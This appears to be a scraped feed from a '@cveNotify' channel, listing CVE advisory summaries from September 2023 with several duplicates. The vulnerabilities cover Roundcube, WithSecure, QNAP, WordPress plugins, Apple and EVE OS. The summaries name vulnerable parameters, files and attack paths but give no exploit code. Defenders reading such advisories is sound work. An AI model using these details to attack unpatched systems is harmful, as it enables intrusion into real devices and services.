🚨 CVE-2023-43770Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.🎖@cveNotify |
|
| 2023-09-22 15:07:35 |
🚨 CVE-2023-43771In nqptp-message-handlers.c in nqptp before 1.2.3, crafted packets received on the control port could crash the program.🎖@cveNotify |
|
| 2023-09-22 15:07:34 |
🚨 CVE-2023-43782Cadence through 0.9.2 2023-08-21 uses an Insecure /tmp/.cadence-aloop-daemon.x Temporary File. The file is used even if it has been created by a local adversary before Cadence started. The adversary can then delete the file, disrupting Cadence.🎖@cveNotify |
|
| 2023-09-22 15:07:33 |
🚨 CVE-2023-43783Cadence through 0.9.2 2023-08-21 uses an Insecure /tmp/cadence-wineasio.reg Temporary File. The filename is used even if it has been created by a local adversary before Cadence started. The adversary can leverage this to create or overwrite files via a symlink attack. In some kernel configurations, code injection into the Wine registry is possible.🎖@cveNotify |
|
| 2023-09-22 15:07:29 |
🚨 CVE-2023-43784** DISPUTED ** Plesk Onyx 17.8.11 has accessKeyId and secretAccessKey fields that are related to an Amazon AWS Firehose component. NOTE: the vendor's position is that there is no security threat.🎖@cveNotify |
|
| 2023-09-22 15:07:28 |
🚨 CVE-2023-23362An OS command injection vulnerability has been reported to affect QNAP operating systems. If exploited, the vulnerability allows remote authenticated users to execute commands via susceptible QNAP devices.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2376 build 20230421 and laterQTS 4.5.4.2374 build 20230416 and laterQuTS hero h5.0.1.2376 build 20230421 and laterQuTS hero h4.5.4.2374 build 20230417 and laterQuTScloud c5.0.1.2374 and later🎖@cveNotify |
|
| 2023-09-22 15:07:27 |
🚨 CVE-2023-23363A buffer copy without checking size of input vulnerability has been reported to affect QNAP operating system. If exploited, the vulnerability possibly allows remote users to execute code via unspecified vectors.We have already fixed the vulnerability in the following versions:QTS 4.3.6.2441 build 20230621 and laterQTS 4.3.3.2420 build 20230621 and laterQTS 4.2.6 build 20230621 and laterQTS 4.3.4.2451 build 20230621 and later🎖@cveNotify |
|
| 2023-09-22 15:07:26 |
🚨 CVE-2023-23364A buffer copy without checking size of input vulnerability has been reported to affect QNAP operating systems. If exploited, the vulnerability possibly allows remote users to execute code via unspecified vectors.We have already fixed the vulnerability in the following versions:Multimedia Console 2.1.1 ( 2023/03/29 ) and laterMultimedia Console 1.4.7 ( 2023/03/20 ) and later🎖@cveNotify |
|
| 2023-09-22 15:07:25 |
🚨 CVE-2023-39043An information leak in YKC Tokushima_awayokocho Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-22 13:07:39 |
🚨 CVE-2023-43760Certain WithSecure products allow Denial of Service via a fuzzed PE32 file. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 13:07:38 |
🚨 CVE-2023-43761Certain WithSecure products allow Denial of Service (infinite loop). This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 13:07:37 |
🚨 CVE-2023-43762Certain WithSecure products allow Unauthenticated Remote Code Execution via the web server (backend), issue 1 of 2. This affects WithSecure Policy Manager 15 and Policy Manager Proxy 15.🎖@cveNotify |
|
| 2023-09-22 13:07:36 |
🚨 CVE-2023-43763Certain WithSecure products allow XSS via an unvalidated parameter in the endpoint. This affects WithSecure Policy Manager 15 on Windows and Linux.🎖@cveNotify |
|
| 2023-09-22 13:07:35 |
🚨 CVE-2023-43764Certain WithSecure products allow Unauthenticated Remote Code Execution via the web server (backend), issue 2 of 2. This affects WithSecure Policy Manager 15 on Windows and Linux.🎖@cveNotify |
|
| 2023-09-22 13:07:34 |
🚨 CVE-2023-43765Certain WithSecure products allow Denial of Service in the aeelf component. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 13:07:32 |
🚨 CVE-2023-43766Certain WithSecure products allow Local privilege escalation via the lhz archive unpack handler. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 13:07:31 |
🚨 CVE-2023-43767Certain WithSecure products allow Denial of Service via the aepack archive unpack handler. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 13:07:30 |
🚨 CVE-2023-4716The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_gallery' shortcode in versions up to, and including, 3.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-22 13:07:29 |
🚨 CVE-2023-4774The WP-Matomo Integration (WP-Piwik) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wp-piwik' shortcode in versions up to, and including, 1.0.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-22 10:37:41 |
🚨 CVE-2023-43090A vulnerability was found in GNOME Shell. GNOME Shell's lock screen allows an unauthenticated local user to view windows of the locked desktop session by using keyboard shortcuts to unlock the restricted functionality of the screenshot tool.🎖@cveNotify |
|
| 2023-09-22 10:37:40 |
🚨 CVE-2023-43770Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.🎖@cveNotify |
|
| 2023-09-22 10:37:37 |
🚨 CVE-2023-43771In nqptp-message-handlers.c in nqptp before 1.2.3, crafted packets received on the control port could crash the program.🎖@cveNotify |
|
| 2023-09-22 10:37:36 |
🚨 CVE-2023-43783Cadence through 0.9.2 2023-08-21 uses an Insecure /tmp/cadence-wineasio.reg Temporary File. The filename is used even if it has been created by a local adversary before Cadence started. The adversary can leverage this to create or overwrite files via a symlink attack. In some kernel configurations, code injection into the Wine registry is possible.🎖@cveNotify |
|
| 2023-09-22 10:37:35 |
🚨 CVE-2023-43784** DISPUTED ** Plesk Onyx 17.8.11 has accessKeyId and secretAccessKey fields that are related to an Amazon AWS Firehose component. NOTE: the vendor's position is that there is no security threat.🎖@cveNotify |
|
| 2023-09-22 10:37:34 |
🚨 CVE-2023-4716The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_gallery' shortcode in versions up to, and including, 3.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-22 10:37:31 |
🚨 CVE-2023-4774The WP-Matomo Integration (WP-Piwik) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wp-piwik' shortcode in versions up to, and including, 1.0.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-22 10:37:30 |
🚨 CVE-2023-43760Certain WithSecure products allow Denial of Service via a fuzzed PE32 file. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 10:37:29 |
🚨 CVE-2023-43762Certain WithSecure products allow Unauthenticated Remote Code Execution via the web server (backend), issue 1 of 2. This affects WithSecure Policy Manager 15 and Policy Manager Proxy 15.🎖@cveNotify |
|
| 2023-09-22 10:37:25 |
🚨 CVE-2023-43764Certain WithSecure products allow Unauthenticated Remote Code Execution via the web server (backend), issue 2 of 2. This affects WithSecure Policy Manager 15 on Windows and Linux.🎖@cveNotify |
|
| 2023-09-22 10:37:24 |
🚨 CVE-2023-43766Certain WithSecure products allow Local privilege escalation via the lhz archive unpack handler. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 10:37:23 |
🚨 CVE-2023-43767Certain WithSecure products allow Denial of Service via the aepack archive unpack handler. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, Linux Security 64 12.0 , Linux Protection 12.0, and WithSecure Atlant (formerly F-Secure Atlant) 1.0.35-1.🎖@cveNotify |
|
| 2023-09-22 06:07:48 |
🚨 CVE-2023-43241D-Link DIR-823G v1.0.2B05 was discovered to contain a stack overflow via parameter TXPower and GuardInt in SetWLanRadioSecurity.🎖@cveNotify |
|
| 2023-09-22 06:07:47 |
🚨 CVE-2023-43235D-Link DIR-823G v1.0.2B05 was discovered to contain a stack overflow via parameter StartTime and EndTime in SetWifiDownSettings.🎖@cveNotify |
|
| 2023-09-22 06:07:46 |
🚨 CVE-2023-43274Phpjabbers PHP Shopping Cart 4.2 is vulnerable to SQL Injection via the id parameter.🎖@cveNotify |
|
| 2023-09-22 06:07:45 |
🚨 CVE-2023-43135There is an unauthorized access vulnerability in TP-LINK ER5120G 4.0 2.0.0 Build 210817 Rel.80868n, which allows attackers to obtain sensitive information of the device without authentication, obtain user tokens, and ultimately log in to the device backend management.🎖@cveNotify |
|
| 2023-09-22 06:07:41 |
🚨 CVE-2023-36234Cross Site Scripting (XSS) vulnerability in Netbox 3.5.1, allows attackers to execute arbitrary code via Name field in device-roles/add function.🎖@cveNotify |
|
| 2023-09-22 06:07:40 |
🚨 CVE-2023-36109Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.🎖@cveNotify |
|
| 2023-09-22 06:07:39 |
🚨 CVE-2023-42335Unrestricted File Upload vulnerability in Fl3xx Dispatch 2.10.37 and fl3xx Crew 2.10.37 allows a remote attacker to execute arbitrary code via the add attachment function in the New Expense component.🎖@cveNotify |
|
| 2023-09-22 06:07:38 |
🚨 CVE-2023-43134There is an unauthorized access vulnerability in Netis 360RAC1200 v1.3.4517, which allows attackers to obtain sensitive information of the device without authentication, obtain user tokens, and ultimately log in to the device backend management.🎖@cveNotify |
|
| 2023-09-22 06:07:35 |
🚨 CVE-2023-43137TPLINK TL-ER5120G 4.0 2.0.0 Build 210817 Rel.80868n has a command injection vulnerability, when an attacker adds ACL rules after authentication, and the rule name parameter has injection points.🎖@cveNotify |
|
| 2023-09-22 06:07:34 |
🚨 CVE-2023-42334An Indirect Object Reference (IDOR) in Fl3xx Dispatch 2.10.37 and fl3xx Crew 2.10.37 allows a remote attacker to escalate privileges via the user parameter.🎖@cveNotify |
|
| 2023-09-22 06:07:33 |
🚨 CVE-2023-42147An issue in CloudExplorer Lite 1.3.1 allows an attacker to obtain sensitive information via the login key component.🎖@cveNotify |
|
| 2023-09-22 06:07:32 |
🚨 CVE-2023-40930Skyworth 3.0 OS is vulnerable to Directory Traversal.🎖@cveNotify |
|
| 2023-09-22 06:07:29 |
🚨 CVE-2023-41484An issue in cimg.eu Cimg Library v2.9.3 allows an attacker to obtain sensitive information via a crafted JPEG file.🎖@cveNotify |
|
| 2023-09-22 06:07:28 |
🚨 CVE-2023-43620An issue was discovered in Croc through 9.6.5. A sender may place ANSI or CSI escape sequences in a filename to attack the terminal device of a receiver.🎖@cveNotify |
|
| 2023-09-22 06:07:27 |
🚨 CVE-2023-43618An issue was discovered in Croc through 9.6.5. The protocol requires a sender to provide its local IP addresses in cleartext via an ips? message.🎖@cveNotify |
|
| 2023-09-22 06:07:26 |
🚨 CVE-2023-43619An issue was discovered in Croc through 9.6.5. A sender may send dangerous new files to a receiver, such as executable content or a .ssh/authorized_keys file.🎖@cveNotify |
|
| 2023-09-22 00:37:15 |
🚨 CVE-2023-4853A flaw was found in Quarkus where HTTP security policies are not sanitizing certain character permutations correctly when accepting requests, resulting in incorrect evaluation of permissions. This issue could allow an attacker to bypass the security policy altogether, resulting in unauthorized endpoint access and possibly a denial of service.🎖@cveNotify |
|
| 2023-09-22 00:37:14 |
🚨 CVE-2022-30114A heap-based buffer overflow in a network service in Fastweb FASTGate MediaAccess FGA2130FWB, firmware version 18.3.n.0482_FW_230_FGA2130, and DGA4131FWB, firmware version up to 18.3.n.0462_FW_261_DGA4131, allows a remote attacker to reboot the device through a crafted HTTP request, causing DoS.🎖@cveNotify |
|
| 2023-09-21 22:37:27 |
🚨 CVE-2023-38343An XXE (XML external entity injection) vulnerability exists in the CSEP component of Ivanti Endpoint Manager before 2022 SU4. External entity references are enabled in the XML parser configuration. Exploitation of this vulnerability can lead to file disclosure or Server Side Request Forgery.🎖@cveNotify |
|
| 2023-09-21 22:37:26 |
🚨 CVE-2023-38344An issue was discovered in Ivanti Endpoint Manager before 2022 SU4. A file disclosure vulnerability exists in the GetFileContents SOAP action exposed via /landesk/managementsuite/core/core.secure/OsdScript.asmx. The application does not sufficiently restrict user-supplied paths, allowing for an authenticated attacker to read arbitrary files from a remote system, including the private key used to authenticate to agents for remote access.🎖@cveNotify |
|
| 2023-09-21 22:37:25 |
🚨 CVE-2023-34576SQL injection vulnerability in updatepos.php in PrestaShop opartfaq through 1.0.3 allows remote attackers to run arbitrary SQL commands via unspedified vector.🎖@cveNotify |
|
| 2023-09-21 22:37:24 |
🚨 CVE-2023-42482Samsung Mobile Processor Exynos 2200 allows a GPU Use After Free.🎖@cveNotify |
|
| 2023-09-21 22:37:23 |
🚨 CVE-2023-41991A certificate validation issue was addressed. This issue is fixed in iOS 16.7 and iPadOS 16.7, OS 17.0.1 and iPadOS 17.0.1, watchOS 9.6.3, macOS Ventura 13.6, watchOS 10.0.1. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-09-21 22:37:22 |
🚨 CVE-2023-41992The issue was addressed with improved checks. This issue is fixed in iOS 16.7 and iPadOS 16.7, OS 17.0.1 and iPadOS 17.0.1, watchOS 9.6.3, macOS Ventura 13.6, macOS Monterey 12.7, watchOS 10.0.1. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-09-21 22:37:18 |
🚨 CVE-2020-35357A buffer overflow can occur when calculating the quantile value using the Statistics Library of GSL (GNU Scientific Library), versions 2.5 and 2.6. Processing a maliciously crafted input data for gsl_stats_quantile_from_sorted_data of the library may lead to unexpected application termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-09-21 22:37:17 |
🚨 CVE-2023-43374Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.🎖@cveNotify |
|
| 2023-09-21 22:37:16 |
🚨 CVE-2023-42793In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible🎖@cveNotify |
|
| 2023-09-21 22:37:15 |
🚨 CVE-2023-43566In JetBrains TeamCity before 2023.05.4 stored XSS was possible during nodes configuration🎖@cveNotify |
|
| 2023-09-21 21:07:37 |
🚨 CVE-2023-41992The issue was addressed with improved checks. This issue is fixed in iOS 16.7 and iPadOS 16.7, OS 17.0.1 and iPadOS 17.0.1, watchOS 9.6.3, macOS Ventura 13.6, macOS Monterey 12.7, watchOS 10.0.1. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-09-21 21:07:36 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in Safari 16.6.1, macOS Ventura 13.6, OS 17.0.1 and iPadOS 17.0.1, iOS 16.7 and iPadOS 16.7. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-09-21 21:07:35 |
🚨 CVE-2023-42280mee-admin 1.5 is vulnerable to Directory Traversal. The download method in the CommonFileController.java file does not verify the incoming data, resulting in arbitrary file reading.🎖@cveNotify |
|
| 2023-09-21 21:07:34 |
🚨 CVE-2023-40442A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-09-21 21:07:32 |
🚨 CVE-2023-41990The issue was addressed with improved handling of caches. This issue is fixed in tvOS 16.3, iOS 16.3 and iPadOS 16.3, macOS Monterey 12.6.8, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Ventura 13.2, watchOS 9.3. Processing a font file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2023-09-21 21:07:31 |
🚨 CVE-2023-41064A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-09-21 21:07:29 |
🚨 CVE-2023-32649A Denial of Service (Dos) vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in certain fields used in the Asset Intelligence functionality of our IDS, allows an unauthenticated attacker to crash the IDS module by sending specially crafted malformed network packets.During the (limited) time window before the IDS module is automatically restarted, network traffic may not be analyzed.🎖@cveNotify |
|
| 2023-09-21 21:07:28 |
🚨 CVE-2023-2567A SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in certain parameters used in the Query functionality, allows an authenticated attacker to execute arbitrary SQL queries on the DBMS used by the web application.Authenticated users can extract arbitrary information from the DBMS in an uncontrolled way.🎖@cveNotify |
|
| 2023-09-21 21:07:27 |
🚨 CVE-2023-4094ARCONTE Aurea's authentication system, in its 1.5.0.0 version, could allow an attacker to make incorrect access requests in order to block each legitimate account and cause a denial of service. In addition, a resource has been identified that could allow circumventing the attempt limit set in the login form.🎖@cveNotify |
|
| 2023-09-21 21:07:26 |
🚨 CVE-2023-29245A SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in certain fields used in the Asset Intelligence functionality of our IDS, may allow an unauthenticated attacker to execute arbitrary SQL statements on the DBMS used by the web application by sending specially crafted malicious network packets.Malicious users with extensive knowledge on the underlying system may be able to extract arbitrary information from the DBMS in an uncontrolled way, or to alter its structure and data.🎖@cveNotify |
|
| 2023-09-21 21:07:25 |
🚨 CVE-2023-5009An issue has been discovered in GitLab EE affecting all versions starting from 13.12 before 16.2.7, all versions starting from 16.3 before 16.3.4. It was possible for an attacker to run pipeline jobs as an arbitrary user via scheduled security scan policies. This was a bypass of [CVE-2023-3932](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3932) showing additional impact.🎖@cveNotify |
|
| 2023-09-21 21:07:24 |
🚨 CVE-2023-43375Hoteldruid v3.0.5 was discovered to contain multiple SQL injection vulnerabilities at /hoteldruid/clienti.php via the annonascita, annoscaddoc, giornonascita, giornoscaddoc, lingua_cli, mesenascita, and mesescaddoc parameters.🎖@cveNotify |
|
| 2023-09-21 21:07:23 |
🚨 CVE-2023-5054The Super Store Finder plugin for WordPress is vulnerable to unauthenticated arbitrary email creation and relay in versions up to, and including, 6.9.2. This is due to insufficient restrictions on the sendMail.php file that allows direct access. This makes it possible for unauthenticated attackers to send emails utilizing the vulnerable site's server, with arbitrary content. Please note that this vulnerability has already been publicly disclosed with an exploit which is why we are publishing the details without a patch available, we are attempting to initiate contact with the developer.🎖@cveNotify |
|
| 2023-09-21 21:07:22 |
🚨 CVE-2023-42399Cross Site Scripting vulnerability in xdsoft.net Jodit Editor v.4.0.0-beta.86 allows a remote attacker to obtain sensitive information via the rich text editor component.🎖@cveNotify |
|
| 2023-09-21 21:07:21 |
🚨 CVE-2023-43376A cross-site scripting (XSS) vulnerability in /hoteldruid/clienti.php of Hoteldruid v3.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the nometipotariffa1 parameter.🎖@cveNotify |
|
| 2023-09-21 21:07:19 |
🚨 CVE-2023-39446** UNSUPPPORTED WHEN ASSIGNED ** Thanks to the weaknesses that the web application has at the user management level, an attacker could obtain the information from the headers that is necessary to create specially designed URLs and originate malicious actions when a legitimate user is logged into the web application.🎖@cveNotify |
|
| 2023-09-21 21:07:18 |
🚨 CVE-2023-43377A cross-site scripting (XSS) vulnerability in /hoteldruid/visualizza_contratto.php of Hoteldruid v3.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the destinatario_email1 parameter.🎖@cveNotify |
|
| 2023-09-21 21:07:17 |
🚨 CVE-2023-39452** UNSUPPPORTED WHEN ASSIGNED ** The web application that owns the device clearly stores the credentials within the user management section. Obtaining this information can be done remotely due to the incorrect management of the sessions in the web application.🎖@cveNotify |
|
| 2023-09-21 21:07:16 |
🚨 CVE-2019-1010283Univention Corporate Server univention-directory-notifier 12.0.1-3 and earlier is affected by: CWE-213: Intentional Information Exposure. The impact is: Loss of Confidentiality. The component is: function data_on_connection() in src/callback.c. The attack vector is: network connectivity. The fixed version is: 12.0.1-4 and later.🎖@cveNotify |
|
| 2023-09-21 21:07:15 |
🚨 CVE-2023-40619phpPgAdmin 7.14.4 and earlier is vulnerable to deserialization of untrusted data which may lead to remote code execution because user-controlled data is directly passed to the PHP 'unserialize()' function in multiple places. An example is the functionality to manage tables in 'tables.php' where the 'ma[]' POST parameter is deserialized.🎖@cveNotify |
|
| 2023-09-21 19:07:20 |
🚨 CVE-2023-43274Phpjabbers PHP Shopping Cart 4.2 is vulnerable to SQL Injection via the id parameter.🎖@cveNotify |
|
| 2023-09-21 19:07:19 |
🚨 CVE-2023-43309There is a stored cross-site scripting (XSS) vulnerability in Webmin 2.002 and below via the Cluster Cron Job tab Input field, which allows attackers to run malicious scripts by injecting a specially crafted payload.🎖@cveNotify |
|
| 2023-09-21 19:07:18 |
🚨 CVE-2023-43631On boot, the Pillar eve container checks for the existence and content of“/config/authorized_keys”.If the file is present, and contains a supported public key, the container will go on to openport 22 and enable sshd with the given keys as the authorized keys for root login.An attacker could easily add their own keys and gain full control over the system withouttriggering the “measured boot” mechanism implemented by EVE OS, and without markingthe device as “UUD” (“Unknown Update Detected”).This is because the “/config” partition is not protected by “measured boot”, it is mutable, andit is not encrypted in any way.An attacker can gain full control over the device without changing the PCR values, thus nottriggering the “measured boot” mechanism, and having full access to the vault.Note:This issue was partially fixed in these commits (after disclosure to Zededa), where the configpartition measurement was added to PCR13:• aa3501d6c57206ced222c33aea15a9169d629141• 5fef4d92e75838cc78010edaed5247dfbdae1889.This issue was made viable in version 9.0.0 when the calculation was moved to PCR14 but it was not included in the measured boot.🎖@cveNotify |
|
| 2023-09-21 19:07:17 |
🚨 CVE-2023-43632As noted in the “VTPM.md” file in the eve documentation, “VTPM is a server listening on port8877 in EVE, exposing limited functionality of the TPM to the clients. VTPM allows clients toexecute tpm2-tools binaries from a list of hardcoded options”The communication with this server is done using protobuf, and the data is comprised of 2parts:1. Header2. DataWhen a connection is made, the server is waiting for 4 bytes of data, which will be the header,and these 4 bytes would be parsed as uint32 size of the actual data to come.Then, in the function “handleRequest” this size is then used in order to allocate a payload onthe stack for the incoming data.As this payload is allocated on the stack, this will allow overflowing the stack size allocated forthe relevant process with freely controlled data.* An attacker can crash the system. * An attacker can gain control over the system, specifically on the “vtpm_server” processwhich has very high privileges.🎖@cveNotify |
|
| 2023-09-21 19:07:16 |
🚨 CVE-2023-43633On boot, the Pillar eve container checks for the existence and content of“/config/GlobalConfig/global.json”.If the file exists, it overrides the existing configuration on the device on boot.This allows an attacker to change the system’s configuration, which also includes somedebug functions.This could be used to unlock the ssh with custom “authorized_keys” via the“debug.enable.ssh” key, similar to the “authorized_keys” finding that was noted before.Other usages include unlocking the usb to enable the keyboard via the “debug.enable.usb”key, allowing VNC access via the “app.allow.vnc” key, and more.An attacker could easily enable these debug functionalities without triggering the “measuredboot” mechanism implemented by EVE OS, and without marking the device as “UUD”(“Unknown Update Detected”).This is because the “/config” partition is not protected by “measured boot”, it is mutable and itis not encrypted in any way.An attacker can gain full control over the device without changing the PCR values, thereby nottriggering the “measured boot” mechanism, and having full access to the vault.Note:This issue was partially fixed in these commits (after disclosure to Zededa), where the configpartition measurement was added to PCR13:• aa3501d6c57206ced222c33aea15a9169d629141• 5fef4d92e75838cc78010edaed5247dfbdae1889.This issue was made viable in version 9.0.0 when the calculation was moved to PCR14 but it was not included in the measured boot.🎖@cveNotify |
|
| 2023-09-21 19:07:15 |
🚨 CVE-2023-43634When sealing/unsealing the “vault” key, a list of PCRs is used, which defines which PCRsare used.In a previous project, CYMOTIVE found that the configuration is not protected by the secureboot, and in response Zededa implemented measurements on the config partition that wasmapped to PCR 13.In that process, PCR 13 was added to the list of PCRs that seal/unseal the key.In commit “56e589749c6ff58ded862d39535d43253b249acf”, the config partitionmeasurement moved from PCR 13 to PCR 14, but PCR 14 was not added to the list ofPCRs that seal/unseal the key.This change makes the measurement of PCR 14 effectively redundant as it would not affectthe sealing/unsealing of the key.An attacker could modify the config partition without triggering the measured boot, this couldresult in the attacker gaining full control over the device with full access to the contents of theencrypted “vault”🎖@cveNotify |
|
| 2023-09-21 16:58:37 |
🚨 CVE-2023-41929A DLL hijacking vulnerability in Samsung Memory Card & UFD Authentication Utility PC Software before 1.0.1 could allow a local attacker to escalate privileges. (An attacker must already have user privileges on Windows to exploit this vulnerability.)🎖@cveNotify |
|
| 2023-09-21 16:58:35 |
🚨 CVE-2023-32187An Allocation of Resources Without Limits or Throttling vulnerability in SUSE k3s allows attackers with access to K3s servers' apiserver/supervisor port (TCP 6443) cause denial of service.This issue affects k3s: from v1.24.0 before v1.24.17+k3s1, from v1.25.0 before v1.25.13+k3s1, from v1.26.0 before v1.26.8+k3s1, from sev1.27.0 before v1.27.5+k3s1, from v1.28.0 before v1.28.1+k3s1.🎖@cveNotify |
|
| 2023-09-21 16:58:34 |
🚨 CVE-2023-40183DataEase is an open source data visualization and analysis tool. Prior to version 1.18.11, DataEase has a vulnerability that allows an attacker to to obtain user cookies. The program only uses the `ImageIO.read()` method to determine whether the file is an image file or not. There is no whitelisting restriction on file suffixes. This allows the attacker to synthesize the attack code into an image for uploading and change the file extension to html. The attacker may steal user cookies by accessing links. The vulnerability has been fixed in v1.18.11. There are no known workarounds.🎖@cveNotify |
|
| 2023-09-21 16:58:33 |
🚨 CVE-2023-41048plone.namedfile allows users to handle `File` and `Image` fields targeting, but not depending on, Plone Dexterity content. Prior to versions 5.6.1, 6.0.3, 6.1.3, and 6.2.1, there is a stored cross site scripting vulnerability for SVG images. A security hotfix from 2021 already partially fixed this by making sure SVG images are always downloaded instead of shown inline. But the same problem still exists for scales of SVG images. Note that an image tag with an SVG image as source is not vulnerable, even when the SVG image contains malicious code. To exploit the vulnerability, an attacker would first need to upload an image, and then trick a user into following a specially crafted link. Patches are available in versions 5.6.1 (for Plone 5.2), 6.0.3 (for Plone 6.0.0-6.0.4), 6.1.3 (for Plone 6.0.5-6.0.6), and 6.2.1 (for Plone 6.0.7). There are no known workarounds.🎖@cveNotify |
|
| 2023-09-21 16:58:32 |
🚨 CVE-2023-42457plone.rest allows users to use HTTP verbs such as GET, POST, PUT, DELETE, etc. in Plone. Starting in the 2.x branch and prior to versions 2.0.1 and 3.0.1, when the `++api++` traverser is accidentally used multiple times in a url, handling it takes increasingly longer, making the server less responsive. Patches are available in `plone.rest` 2.0.1 and 3.0.1. Series 1.x is not affected. As a workaround, one may redirect `/++api++/++api++` to `/++api++` in one's frontend web server (nginx, Apache).🎖@cveNotify |
|
| 2023-09-21 16:58:30 |
